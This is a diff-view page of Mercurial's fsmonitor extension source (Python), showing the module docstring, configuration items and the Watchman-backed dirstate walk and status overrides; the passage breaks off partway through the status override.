##// END OF EJS Templates
codemod: use pycompat.isdarwin...
Jun Wu -
r34648:dacfcdd8 default
parent child Browse files
Show More
@@ -1,803 +1,803 b''
1 # __init__.py - fsmonitor initialization and overrides
1 # __init__.py - fsmonitor initialization and overrides
2 #
2 #
3 # Copyright 2013-2016 Facebook, Inc.
3 # Copyright 2013-2016 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
9
9
10 Integrates the file-watching program Watchman with Mercurial to produce faster
10 Integrates the file-watching program Watchman with Mercurial to produce faster
11 status results.
11 status results.
12
12
13 On a particular Linux system, for a real-world repository with over 400,000
13 On a particular Linux system, for a real-world repository with over 400,000
14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
15 system, with fsmonitor it takes about 0.3 seconds.
15 system, with fsmonitor it takes about 0.3 seconds.
16
16
17 fsmonitor requires no configuration -- it will tell Watchman about your
17 fsmonitor requires no configuration -- it will tell Watchman about your
18 repository as necessary. You'll need to install Watchman from
18 repository as necessary. You'll need to install Watchman from
19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
20
20
21 The following configuration options exist:
21 The following configuration options exist:
22
22
23 ::
23 ::
24
24
25 [fsmonitor]
25 [fsmonitor]
26 mode = {off, on, paranoid}
26 mode = {off, on, paranoid}
27
27
28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
31 and ensure that the results are consistent.
31 and ensure that the results are consistent.
32
32
33 ::
33 ::
34
34
35 [fsmonitor]
35 [fsmonitor]
36 timeout = (float)
36 timeout = (float)
37
37
38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
39 to return results. Defaults to `2.0`.
39 to return results. Defaults to `2.0`.
40
40
41 ::
41 ::
42
42
43 [fsmonitor]
43 [fsmonitor]
44 blacklistusers = (list of userids)
44 blacklistusers = (list of userids)
45
45
46 A list of usernames for which fsmonitor will disable itself altogether.
46 A list of usernames for which fsmonitor will disable itself altogether.
47
47
48 ::
48 ::
49
49
50 [fsmonitor]
50 [fsmonitor]
51 walk_on_invalidate = (boolean)
51 walk_on_invalidate = (boolean)
52
52
53 Whether or not to walk the whole repo ourselves when our cached state has been
53 Whether or not to walk the whole repo ourselves when our cached state has been
54 invalidated, for example when Watchman has been restarted or .hgignore rules
54 invalidated, for example when Watchman has been restarted or .hgignore rules
55 have been changed. Walking the repo in that case can result in competing for
55 have been changed. Walking the repo in that case can result in competing for
56 I/O with Watchman. For large repos it is recommended to set this value to
56 I/O with Watchman. For large repos it is recommended to set this value to
57 false. You may wish to set this to true if you have a very fast filesystem
57 false. You may wish to set this to true if you have a very fast filesystem
58 that can outpace the IPC overhead of getting the result data for the full repo
58 that can outpace the IPC overhead of getting the result data for the full repo
59 from Watchman. Defaults to false.
59 from Watchman. Defaults to false.
60
60
61 fsmonitor is incompatible with the largefiles and eol extensions, and
61 fsmonitor is incompatible with the largefiles and eol extensions, and
62 will disable itself if any of those are active.
62 will disable itself if any of those are active.
63
63
64 '''
64 '''
65
65
66 # Platforms Supported
66 # Platforms Supported
67 # ===================
67 # ===================
68 #
68 #
69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
70 # even under severe loads.
70 # even under severe loads.
71 #
71 #
72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
74 # user testing under normal loads.
74 # user testing under normal loads.
75 #
75 #
76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
77 # very little testing has been done.
77 # very little testing has been done.
78 #
78 #
79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
80 #
80 #
81 # Known Issues
81 # Known Issues
82 # ============
82 # ============
83 #
83 #
84 # * fsmonitor will disable itself if any of the following extensions are
84 # * fsmonitor will disable itself if any of the following extensions are
85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
86 # * fsmonitor will produce incorrect results if nested repos that are not
86 # * fsmonitor will produce incorrect results if nested repos that are not
87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
88 #
88 #
89 # The issues related to nested repos and subrepos are probably not fundamental
89 # The issues related to nested repos and subrepos are probably not fundamental
90 # ones. Patches to fix them are welcome.
90 # ones. Patches to fix them are welcome.
91
91
92 from __future__ import absolute_import
92 from __future__ import absolute_import
93
93
94 import codecs
94 import codecs
95 import hashlib
95 import hashlib
96 import os
96 import os
97 import stat
97 import stat
98 import sys
98 import sys
99 import weakref
99 import weakref
100
100
101 from mercurial.i18n import _
101 from mercurial.i18n import _
102 from mercurial.node import (
102 from mercurial.node import (
103 hex,
103 hex,
104 nullid,
104 nullid,
105 )
105 )
106
106
107 from mercurial import (
107 from mercurial import (
108 context,
108 context,
109 encoding,
109 encoding,
110 error,
110 error,
111 extensions,
111 extensions,
112 localrepo,
112 localrepo,
113 merge,
113 merge,
114 pathutil,
114 pathutil,
115 pycompat,
115 pycompat,
116 registrar,
116 registrar,
117 scmutil,
117 scmutil,
118 util,
118 util,
119 )
119 )
120 from mercurial import match as matchmod
120 from mercurial import match as matchmod
121
121
122 from . import (
122 from . import (
123 pywatchman,
123 pywatchman,
124 state,
124 state,
125 watchmanclient,
125 watchmanclient,
126 )
126 )
127
127
128 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
128 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
129 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
129 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
130 # be specifying the version(s) of Mercurial they are tested with, or
130 # be specifying the version(s) of Mercurial they are tested with, or
131 # leave the attribute unspecified.
131 # leave the attribute unspecified.
132 testedwith = 'ships-with-hg-core'
132 testedwith = 'ships-with-hg-core'
133
133
134 configtable = {}
134 configtable = {}
135 configitem = registrar.configitem(configtable)
135 configitem = registrar.configitem(configtable)
136
136
137 configitem('fsmonitor', 'mode',
137 configitem('fsmonitor', 'mode',
138 default='on',
138 default='on',
139 )
139 )
140 configitem('fsmonitor', 'walk_on_invalidate',
140 configitem('fsmonitor', 'walk_on_invalidate',
141 default=False,
141 default=False,
142 )
142 )
143 configitem('fsmonitor', 'timeout',
143 configitem('fsmonitor', 'timeout',
144 default='2',
144 default='2',
145 )
145 )
146 configitem('fsmonitor', 'blacklistusers',
146 configitem('fsmonitor', 'blacklistusers',
147 default=list,
147 default=list,
148 )
148 )
149
149
150 # This extension is incompatible with the following blacklisted extensions
150 # This extension is incompatible with the following blacklisted extensions
151 # and will disable itself when encountering one of these:
151 # and will disable itself when encountering one of these:
152 _blacklist = ['largefiles', 'eol']
152 _blacklist = ['largefiles', 'eol']
153
153
154 def _handleunavailable(ui, state, ex):
154 def _handleunavailable(ui, state, ex):
155 """Exception handler for Watchman interaction exceptions"""
155 """Exception handler for Watchman interaction exceptions"""
156 if isinstance(ex, watchmanclient.Unavailable):
156 if isinstance(ex, watchmanclient.Unavailable):
157 if ex.warn:
157 if ex.warn:
158 ui.warn(str(ex) + '\n')
158 ui.warn(str(ex) + '\n')
159 if ex.invalidate:
159 if ex.invalidate:
160 state.invalidate()
160 state.invalidate()
161 ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
161 ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
162 else:
162 else:
163 ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
163 ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
164
164
165 def _hashignore(ignore):
165 def _hashignore(ignore):
166 """Calculate hash for ignore patterns and filenames
166 """Calculate hash for ignore patterns and filenames
167
167
168 If this information changes between Mercurial invocations, we can't
168 If this information changes between Mercurial invocations, we can't
169 rely on Watchman information anymore and have to re-scan the working
169 rely on Watchman information anymore and have to re-scan the working
170 copy.
170 copy.
171
171
172 """
172 """
173 sha1 = hashlib.sha1()
173 sha1 = hashlib.sha1()
174 sha1.update(repr(ignore))
174 sha1.update(repr(ignore))
175 return sha1.hexdigest()
175 return sha1.hexdigest()
176
176
177 _watchmanencoding = pywatchman.encoding.get_local_encoding()
177 _watchmanencoding = pywatchman.encoding.get_local_encoding()
178 _fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
178 _fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
179 _fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
179 _fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
180
180
181 def _watchmantofsencoding(path):
181 def _watchmantofsencoding(path):
182 """Fix path to match watchman and local filesystem encoding
182 """Fix path to match watchman and local filesystem encoding
183
183
184 watchman's paths encoding can differ from filesystem encoding. For example,
184 watchman's paths encoding can differ from filesystem encoding. For example,
185 on Windows, it's always utf-8.
185 on Windows, it's always utf-8.
186 """
186 """
187 try:
187 try:
188 decoded = path.decode(_watchmanencoding)
188 decoded = path.decode(_watchmanencoding)
189 except UnicodeDecodeError as e:
189 except UnicodeDecodeError as e:
190 raise error.Abort(str(e), hint='watchman encoding error')
190 raise error.Abort(str(e), hint='watchman encoding error')
191
191
192 try:
192 try:
193 encoded = decoded.encode(_fsencoding, 'strict')
193 encoded = decoded.encode(_fsencoding, 'strict')
194 except UnicodeEncodeError as e:
194 except UnicodeEncodeError as e:
195 raise error.Abort(str(e))
195 raise error.Abort(str(e))
196
196
197 return encoded
197 return encoded
198
198
199 def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
199 def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
200 '''Replacement for dirstate.walk, hooking into Watchman.
200 '''Replacement for dirstate.walk, hooking into Watchman.
201
201
202 Whenever full is False, ignored is False, and the Watchman client is
202 Whenever full is False, ignored is False, and the Watchman client is
203 available, use Watchman combined with saved state to possibly return only a
203 available, use Watchman combined with saved state to possibly return only a
204 subset of files.'''
204 subset of files.'''
205 def bail():
205 def bail():
206 return orig(match, subrepos, unknown, ignored, full=True)
206 return orig(match, subrepos, unknown, ignored, full=True)
207
207
208 if full or ignored or not self._watchmanclient.available():
208 if full or ignored or not self._watchmanclient.available():
209 return bail()
209 return bail()
210 state = self._fsmonitorstate
210 state = self._fsmonitorstate
211 clock, ignorehash, notefiles = state.get()
211 clock, ignorehash, notefiles = state.get()
212 if not clock:
212 if not clock:
213 if state.walk_on_invalidate:
213 if state.walk_on_invalidate:
214 return bail()
214 return bail()
215 # Initial NULL clock value, see
215 # Initial NULL clock value, see
216 # https://facebook.github.io/watchman/docs/clockspec.html
216 # https://facebook.github.io/watchman/docs/clockspec.html
217 clock = 'c:0:0'
217 clock = 'c:0:0'
218 notefiles = []
218 notefiles = []
219
219
220 def fwarn(f, msg):
220 def fwarn(f, msg):
221 self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
221 self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
222 return False
222 return False
223
223
224 def badtype(mode):
224 def badtype(mode):
225 kind = _('unknown')
225 kind = _('unknown')
226 if stat.S_ISCHR(mode):
226 if stat.S_ISCHR(mode):
227 kind = _('character device')
227 kind = _('character device')
228 elif stat.S_ISBLK(mode):
228 elif stat.S_ISBLK(mode):
229 kind = _('block device')
229 kind = _('block device')
230 elif stat.S_ISFIFO(mode):
230 elif stat.S_ISFIFO(mode):
231 kind = _('fifo')
231 kind = _('fifo')
232 elif stat.S_ISSOCK(mode):
232 elif stat.S_ISSOCK(mode):
233 kind = _('socket')
233 kind = _('socket')
234 elif stat.S_ISDIR(mode):
234 elif stat.S_ISDIR(mode):
235 kind = _('directory')
235 kind = _('directory')
236 return _('unsupported file type (type is %s)') % kind
236 return _('unsupported file type (type is %s)') % kind
237
237
238 ignore = self._ignore
238 ignore = self._ignore
239 dirignore = self._dirignore
239 dirignore = self._dirignore
240 if unknown:
240 if unknown:
241 if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
241 if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
242 # ignore list changed -- can't rely on Watchman state any more
242 # ignore list changed -- can't rely on Watchman state any more
243 if state.walk_on_invalidate:
243 if state.walk_on_invalidate:
244 return bail()
244 return bail()
245 notefiles = []
245 notefiles = []
246 clock = 'c:0:0'
246 clock = 'c:0:0'
247 else:
247 else:
248 # always ignore
248 # always ignore
249 ignore = util.always
249 ignore = util.always
250 dirignore = util.always
250 dirignore = util.always
251
251
252 matchfn = match.matchfn
252 matchfn = match.matchfn
253 matchalways = match.always()
253 matchalways = match.always()
254 dmap = self._map._map
254 dmap = self._map._map
255 nonnormalset = getattr(self, '_nonnormalset', None)
255 nonnormalset = getattr(self, '_nonnormalset', None)
256
256
257 copymap = self._map.copymap
257 copymap = self._map.copymap
258 getkind = stat.S_IFMT
258 getkind = stat.S_IFMT
259 dirkind = stat.S_IFDIR
259 dirkind = stat.S_IFDIR
260 regkind = stat.S_IFREG
260 regkind = stat.S_IFREG
261 lnkkind = stat.S_IFLNK
261 lnkkind = stat.S_IFLNK
262 join = self._join
262 join = self._join
263 normcase = util.normcase
263 normcase = util.normcase
264 fresh_instance = False
264 fresh_instance = False
265
265
266 exact = skipstep3 = False
266 exact = skipstep3 = False
267 if match.isexact(): # match.exact
267 if match.isexact(): # match.exact
268 exact = True
268 exact = True
269 dirignore = util.always # skip step 2
269 dirignore = util.always # skip step 2
270 elif match.prefix(): # match.match, no patterns
270 elif match.prefix(): # match.match, no patterns
271 skipstep3 = True
271 skipstep3 = True
272
272
273 if not exact and self._checkcase:
273 if not exact and self._checkcase:
274 # note that even though we could receive directory entries, we're only
274 # note that even though we could receive directory entries, we're only
275 # interested in checking if a file with the same name exists. So only
275 # interested in checking if a file with the same name exists. So only
276 # normalize files if possible.
276 # normalize files if possible.
277 normalize = self._normalizefile
277 normalize = self._normalizefile
278 skipstep3 = False
278 skipstep3 = False
279 else:
279 else:
280 normalize = None
280 normalize = None
281
281
282 # step 1: find all explicit files
282 # step 1: find all explicit files
283 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
283 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
284
284
285 skipstep3 = skipstep3 and not (work or dirsnotfound)
285 skipstep3 = skipstep3 and not (work or dirsnotfound)
286 work = [d for d in work if not dirignore(d[0])]
286 work = [d for d in work if not dirignore(d[0])]
287
287
288 if not work and (exact or skipstep3):
288 if not work and (exact or skipstep3):
289 for s in subrepos:
289 for s in subrepos:
290 del results[s]
290 del results[s]
291 del results['.hg']
291 del results['.hg']
292 return results
292 return results
293
293
294 # step 2: query Watchman
294 # step 2: query Watchman
295 try:
295 try:
296 # Use the user-configured timeout for the query.
296 # Use the user-configured timeout for the query.
297 # Add a little slack over the top of the user query to allow for
297 # Add a little slack over the top of the user query to allow for
298 # overheads while transferring the data
298 # overheads while transferring the data
299 self._watchmanclient.settimeout(state.timeout + 0.1)
299 self._watchmanclient.settimeout(state.timeout + 0.1)
300 result = self._watchmanclient.command('query', {
300 result = self._watchmanclient.command('query', {
301 'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
301 'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
302 'since': clock,
302 'since': clock,
303 'expression': [
303 'expression': [
304 'not', [
304 'not', [
305 'anyof', ['dirname', '.hg'],
305 'anyof', ['dirname', '.hg'],
306 ['name', '.hg', 'wholename']
306 ['name', '.hg', 'wholename']
307 ]
307 ]
308 ],
308 ],
309 'sync_timeout': int(state.timeout * 1000),
309 'sync_timeout': int(state.timeout * 1000),
310 'empty_on_fresh_instance': state.walk_on_invalidate,
310 'empty_on_fresh_instance': state.walk_on_invalidate,
311 })
311 })
312 except Exception as ex:
312 except Exception as ex:
313 _handleunavailable(self._ui, state, ex)
313 _handleunavailable(self._ui, state, ex)
314 self._watchmanclient.clearconnection()
314 self._watchmanclient.clearconnection()
315 return bail()
315 return bail()
316 else:
316 else:
317 # We need to propagate the last observed clock up so that we
317 # We need to propagate the last observed clock up so that we
318 # can use it for our next query
318 # can use it for our next query
319 state.setlastclock(result['clock'])
319 state.setlastclock(result['clock'])
320 if result['is_fresh_instance']:
320 if result['is_fresh_instance']:
321 if state.walk_on_invalidate:
321 if state.walk_on_invalidate:
322 state.invalidate()
322 state.invalidate()
323 return bail()
323 return bail()
324 fresh_instance = True
324 fresh_instance = True
325 # Ignore any prior noteable files from the state info
325 # Ignore any prior noteable files from the state info
326 notefiles = []
326 notefiles = []
327
327
328 # for file paths which require normalization and we encounter a case
328 # for file paths which require normalization and we encounter a case
329 # collision, we store our own foldmap
329 # collision, we store our own foldmap
330 if normalize:
330 if normalize:
331 foldmap = dict((normcase(k), k) for k in results)
331 foldmap = dict((normcase(k), k) for k in results)
332
332
333 switch_slashes = pycompat.ossep == '\\'
333 switch_slashes = pycompat.ossep == '\\'
334 # The order of the results is, strictly speaking, undefined.
334 # The order of the results is, strictly speaking, undefined.
335 # For case changes on a case insensitive filesystem we may receive
335 # For case changes on a case insensitive filesystem we may receive
336 # two entries, one with exists=True and another with exists=False.
336 # two entries, one with exists=True and another with exists=False.
337 # The exists=True entries in the same response should be interpreted
337 # The exists=True entries in the same response should be interpreted
338 # as being happens-after the exists=False entries due to the way that
338 # as being happens-after the exists=False entries due to the way that
339 # Watchman tracks files. We use this property to reconcile deletes
339 # Watchman tracks files. We use this property to reconcile deletes
340 # for name case changes.
340 # for name case changes.
341 for entry in result['files']:
341 for entry in result['files']:
342 fname = entry['name']
342 fname = entry['name']
343 if _fixencoding:
343 if _fixencoding:
344 fname = _watchmantofsencoding(fname)
344 fname = _watchmantofsencoding(fname)
345 if switch_slashes:
345 if switch_slashes:
346 fname = fname.replace('\\', '/')
346 fname = fname.replace('\\', '/')
347 if normalize:
347 if normalize:
348 normed = normcase(fname)
348 normed = normcase(fname)
349 fname = normalize(fname, True, True)
349 fname = normalize(fname, True, True)
350 foldmap[normed] = fname
350 foldmap[normed] = fname
351 fmode = entry['mode']
351 fmode = entry['mode']
352 fexists = entry['exists']
352 fexists = entry['exists']
353 kind = getkind(fmode)
353 kind = getkind(fmode)
354
354
355 if not fexists:
355 if not fexists:
356 # if marked as deleted and we don't already have a change
356 # if marked as deleted and we don't already have a change
357 # record, mark it as deleted. If we already have an entry
357 # record, mark it as deleted. If we already have an entry
358 # for fname then it was either part of walkexplicit or was
358 # for fname then it was either part of walkexplicit or was
359 # an earlier result that was a case change
359 # an earlier result that was a case change
360 if fname not in results and fname in dmap and (
360 if fname not in results and fname in dmap and (
361 matchalways or matchfn(fname)):
361 matchalways or matchfn(fname)):
362 results[fname] = None
362 results[fname] = None
363 elif kind == dirkind:
363 elif kind == dirkind:
364 if fname in dmap and (matchalways or matchfn(fname)):
364 if fname in dmap and (matchalways or matchfn(fname)):
365 results[fname] = None
365 results[fname] = None
366 elif kind == regkind or kind == lnkkind:
366 elif kind == regkind or kind == lnkkind:
367 if fname in dmap:
367 if fname in dmap:
368 if matchalways or matchfn(fname):
368 if matchalways or matchfn(fname):
369 results[fname] = entry
369 results[fname] = entry
370 elif (matchalways or matchfn(fname)) and not ignore(fname):
370 elif (matchalways or matchfn(fname)) and not ignore(fname):
371 results[fname] = entry
371 results[fname] = entry
372 elif fname in dmap and (matchalways or matchfn(fname)):
372 elif fname in dmap and (matchalways or matchfn(fname)):
373 results[fname] = None
373 results[fname] = None
374
374
375 # step 3: query notable files we don't already know about
375 # step 3: query notable files we don't already know about
376 # XXX try not to iterate over the entire dmap
376 # XXX try not to iterate over the entire dmap
377 if normalize:
377 if normalize:
378 # any notable files that have changed case will already be handled
378 # any notable files that have changed case will already be handled
379 # above, so just check membership in the foldmap
379 # above, so just check membership in the foldmap
380 notefiles = set((normalize(f, True, True) for f in notefiles
380 notefiles = set((normalize(f, True, True) for f in notefiles
381 if normcase(f) not in foldmap))
381 if normcase(f) not in foldmap))
382 visit = set((f for f in notefiles if (f not in results and matchfn(f)
382 visit = set((f for f in notefiles if (f not in results and matchfn(f)
383 and (f in dmap or not ignore(f)))))
383 and (f in dmap or not ignore(f)))))
384
384
385 if nonnormalset is not None and not fresh_instance:
385 if nonnormalset is not None and not fresh_instance:
386 if matchalways:
386 if matchalways:
387 visit.update(f for f in nonnormalset if f not in results)
387 visit.update(f for f in nonnormalset if f not in results)
388 visit.update(f for f in copymap if f not in results)
388 visit.update(f for f in copymap if f not in results)
389 else:
389 else:
390 visit.update(f for f in nonnormalset
390 visit.update(f for f in nonnormalset
391 if f not in results and matchfn(f))
391 if f not in results and matchfn(f))
392 visit.update(f for f in copymap
392 visit.update(f for f in copymap
393 if f not in results and matchfn(f))
393 if f not in results and matchfn(f))
394 else:
394 else:
395 if matchalways:
395 if matchalways:
396 visit.update(f for f, st in dmap.iteritems()
396 visit.update(f for f, st in dmap.iteritems()
397 if (f not in results and
397 if (f not in results and
398 (st[2] < 0 or st[0] != 'n' or fresh_instance)))
398 (st[2] < 0 or st[0] != 'n' or fresh_instance)))
399 visit.update(f for f in copymap if f not in results)
399 visit.update(f for f in copymap if f not in results)
400 else:
400 else:
401 visit.update(f for f, st in dmap.iteritems()
401 visit.update(f for f, st in dmap.iteritems()
402 if (f not in results and
402 if (f not in results and
403 (st[2] < 0 or st[0] != 'n' or fresh_instance)
403 (st[2] < 0 or st[0] != 'n' or fresh_instance)
404 and matchfn(f)))
404 and matchfn(f)))
405 visit.update(f for f in copymap
405 visit.update(f for f in copymap
406 if f not in results and matchfn(f))
406 if f not in results and matchfn(f))
407
407
408 audit = pathutil.pathauditor(self._root, cached=True).check
408 audit = pathutil.pathauditor(self._root, cached=True).check
409 auditpass = [f for f in visit if audit(f)]
409 auditpass = [f for f in visit if audit(f)]
410 auditpass.sort()
410 auditpass.sort()
411 auditfail = visit.difference(auditpass)
411 auditfail = visit.difference(auditpass)
412 for f in auditfail:
412 for f in auditfail:
413 results[f] = None
413 results[f] = None
414
414
415 nf = iter(auditpass).next
415 nf = iter(auditpass).next
416 for st in util.statfiles([join(f) for f in auditpass]):
416 for st in util.statfiles([join(f) for f in auditpass]):
417 f = nf()
417 f = nf()
418 if st or f in dmap:
418 if st or f in dmap:
419 results[f] = st
419 results[f] = st
420
420
421 for s in subrepos:
421 for s in subrepos:
422 del results[s]
422 del results[s]
423 del results['.hg']
423 del results['.hg']
424 return results
424 return results
425
425
426 def overridestatus(
426 def overridestatus(
427 orig, self, node1='.', node2=None, match=None, ignored=False,
427 orig, self, node1='.', node2=None, match=None, ignored=False,
428 clean=False, unknown=False, listsubrepos=False):
428 clean=False, unknown=False, listsubrepos=False):
429 listignored = ignored
429 listignored = ignored
430 listclean = clean
430 listclean = clean
431 listunknown = unknown
431 listunknown = unknown
432
432
433 def _cmpsets(l1, l2):
433 def _cmpsets(l1, l2):
434 try:
434 try:
435 if 'FSMONITOR_LOG_FILE' in encoding.environ:
435 if 'FSMONITOR_LOG_FILE' in encoding.environ:
436 fn = encoding.environ['FSMONITOR_LOG_FILE']
436 fn = encoding.environ['FSMONITOR_LOG_FILE']
437 f = open(fn, 'wb')
437 f = open(fn, 'wb')
438 else:
438 else:
439 fn = 'fsmonitorfail.log'
439 fn = 'fsmonitorfail.log'
440 f = self.opener(fn, 'wb')
440 f = self.opener(fn, 'wb')
441 except (IOError, OSError):
441 except (IOError, OSError):
442 self.ui.warn(_('warning: unable to write to %s\n') % fn)
442 self.ui.warn(_('warning: unable to write to %s\n') % fn)
443 return
443 return
444
444
445 try:
445 try:
446 for i, (s1, s2) in enumerate(zip(l1, l2)):
446 for i, (s1, s2) in enumerate(zip(l1, l2)):
447 if set(s1) != set(s2):
447 if set(s1) != set(s2):
448 f.write('sets at position %d are unequal\n' % i)
448 f.write('sets at position %d are unequal\n' % i)
449 f.write('watchman returned: %s\n' % s1)
449 f.write('watchman returned: %s\n' % s1)
450 f.write('stat returned: %s\n' % s2)
450 f.write('stat returned: %s\n' % s2)
451 finally:
451 finally:
452 f.close()
452 f.close()
453
453
454 if isinstance(node1, context.changectx):
454 if isinstance(node1, context.changectx):
455 ctx1 = node1
455 ctx1 = node1
456 else:
456 else:
457 ctx1 = self[node1]
457 ctx1 = self[node1]
458 if isinstance(node2, context.changectx):
458 if isinstance(node2, context.changectx):
459 ctx2 = node2
459 ctx2 = node2
460 else:
460 else:
461 ctx2 = self[node2]
461 ctx2 = self[node2]
462
462
463 working = ctx2.rev() is None
463 working = ctx2.rev() is None
464 parentworking = working and ctx1 == self['.']
464 parentworking = working and ctx1 == self['.']
465 match = match or matchmod.always(self.root, self.getcwd())
465 match = match or matchmod.always(self.root, self.getcwd())
466
466
467 # Maybe we can use this opportunity to update Watchman's state.
467 # Maybe we can use this opportunity to update Watchman's state.
468 # Mercurial uses workingcommitctx and/or memctx to represent the part of
468 # Mercurial uses workingcommitctx and/or memctx to represent the part of
469 # the workingctx that is to be committed. So don't update the state in
469 # the workingctx that is to be committed. So don't update the state in
470 # that case.
470 # that case.
471 # HG_PENDING is set in the environment when the dirstate is being updated
471 # HG_PENDING is set in the environment when the dirstate is being updated
472 # in the middle of a transaction; we must not update our state in that
472 # in the middle of a transaction; we must not update our state in that
473 # case, or we risk forgetting about changes in the working copy.
473 # case, or we risk forgetting about changes in the working copy.
474 updatestate = (parentworking and match.always() and
474 updatestate = (parentworking and match.always() and
475 not isinstance(ctx2, (context.workingcommitctx,
475 not isinstance(ctx2, (context.workingcommitctx,
476 context.memctx)) and
476 context.memctx)) and
477 'HG_PENDING' not in encoding.environ)
477 'HG_PENDING' not in encoding.environ)
478
478
479 try:
479 try:
480 if self._fsmonitorstate.walk_on_invalidate:
480 if self._fsmonitorstate.walk_on_invalidate:
481 # Use a short timeout to query the current clock. If that
481 # Use a short timeout to query the current clock. If that
482 # takes too long then we assume that the service will be slow
482 # takes too long then we assume that the service will be slow
483 # to answer our query.
483 # to answer our query.
484 # walk_on_invalidate indicates that we prefer to walk the
484 # walk_on_invalidate indicates that we prefer to walk the
485 # tree ourselves because we can ignore portions that Watchman
485 # tree ourselves because we can ignore portions that Watchman
486 # cannot and we tend to be faster in the warmer buffer cache
486 # cannot and we tend to be faster in the warmer buffer cache
487 # cases.
487 # cases.
488 self._watchmanclient.settimeout(0.1)
488 self._watchmanclient.settimeout(0.1)
489 else:
489 else:
490 # Give Watchman more time to potentially complete its walk
490 # Give Watchman more time to potentially complete its walk
491 # and return the initial clock. In this mode we assume that
491 # and return the initial clock. In this mode we assume that
492 # the filesystem will be slower than parsing a potentially
492 # the filesystem will be slower than parsing a potentially
493 # very large Watchman result set.
493 # very large Watchman result set.
494 self._watchmanclient.settimeout(
494 self._watchmanclient.settimeout(
495 self._fsmonitorstate.timeout + 0.1)
495 self._fsmonitorstate.timeout + 0.1)
496 startclock = self._watchmanclient.getcurrentclock()
496 startclock = self._watchmanclient.getcurrentclock()
497 except Exception as ex:
497 except Exception as ex:
498 self._watchmanclient.clearconnection()
498 self._watchmanclient.clearconnection()
499 _handleunavailable(self.ui, self._fsmonitorstate, ex)
499 _handleunavailable(self.ui, self._fsmonitorstate, ex)
500 # boo, Watchman failed. bail
500 # boo, Watchman failed. bail
501 return orig(node1, node2, match, listignored, listclean,
501 return orig(node1, node2, match, listignored, listclean,
502 listunknown, listsubrepos)
502 listunknown, listsubrepos)
503
503
504 if updatestate:
504 if updatestate:
505 # We need info about unknown files. This may make things slower the
505 # We need info about unknown files. This may make things slower the
506 # first time, but whatever.
506 # first time, but whatever.
507 stateunknown = True
507 stateunknown = True
508 else:
508 else:
509 stateunknown = listunknown
509 stateunknown = listunknown
510
510
511 if updatestate:
511 if updatestate:
512 ps = poststatus(startclock)
512 ps = poststatus(startclock)
513 self.addpostdsstatus(ps)
513 self.addpostdsstatus(ps)
514
514
515 r = orig(node1, node2, match, listignored, listclean, stateunknown,
515 r = orig(node1, node2, match, listignored, listclean, stateunknown,
516 listsubrepos)
516 listsubrepos)
517 modified, added, removed, deleted, unknown, ignored, clean = r
517 modified, added, removed, deleted, unknown, ignored, clean = r
518
518
519 if not listunknown:
519 if not listunknown:
520 unknown = []
520 unknown = []
521
521
522 # don't do paranoid checks if we're not going to query Watchman anyway
522 # don't do paranoid checks if we're not going to query Watchman anyway
523 full = listclean or match.traversedir is not None
523 full = listclean or match.traversedir is not None
524 if self._fsmonitorstate.mode == 'paranoid' and not full:
524 if self._fsmonitorstate.mode == 'paranoid' and not full:
525 # run status again and fall back to the old walk this time
525 # run status again and fall back to the old walk this time
526 self.dirstate._fsmonitordisable = True
526 self.dirstate._fsmonitordisable = True
527
527
528 # shut the UI up
528 # shut the UI up
529 quiet = self.ui.quiet
529 quiet = self.ui.quiet
530 self.ui.quiet = True
530 self.ui.quiet = True
